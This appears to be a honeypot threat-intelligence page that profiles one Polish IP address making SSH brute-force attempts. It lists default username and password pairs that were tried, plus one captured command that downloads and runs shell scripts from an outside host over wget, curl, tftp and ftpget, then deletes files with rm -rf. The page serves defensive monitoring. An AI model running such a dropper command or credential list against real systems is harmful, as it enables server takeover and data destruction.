TROYANOSYVIRUS
Active ThreatLOW

151.115.110.102

Country of Origin🇵🇱 Poland
First Detection1/11/2026
Last Activity1/11/2026
ISPScaleway S.a.s.
🎯
183
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware

Geolocation

Country
🇵🇱 Poland
City
Warsaw
ASN
AS12876
ISP
Scaleway S.a.s.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

No associated malware

Attempted Credentials

🔐testuser/testuser
2x
🔐oracle/oracle
1x
🔐root/123456
1x
🔐root/1234567890
1x
🔐dev/dev
1x
🔐root/test
1x
🔐ansible/ansible
1x
🔐system/system
1x
🔐ubnt/ubnt
1x
🔐root/toor
1x
🔐root/redhat
1x
🔐pilinux/pilinux123
1x
🔐postgres/postgres
1x
🔐butter/xuelp123
1x
🔐server/server
1x

Executed Commands

$cd /tmp cd /var/run cd /mnt cd /root ; cd /; wget http://195.24.237.39/skid.sh; curl -O http://195.24.237.39/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 195.24.237.39 -c get skid.sh; chmod 777 skid.sh; sh skid.sh; tftp -r skid2.sh -g 195.24.237.39; chmod 777 skid2.sh; sh skid2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.24.237.39 skid1.sh skid1.sh; sh skid1.sh; rm -rf skid.sh skid.sh skid2.sh skid1.sh; rm -rf *1x

Risk Assessment

35
/100
LowMediumHighCritical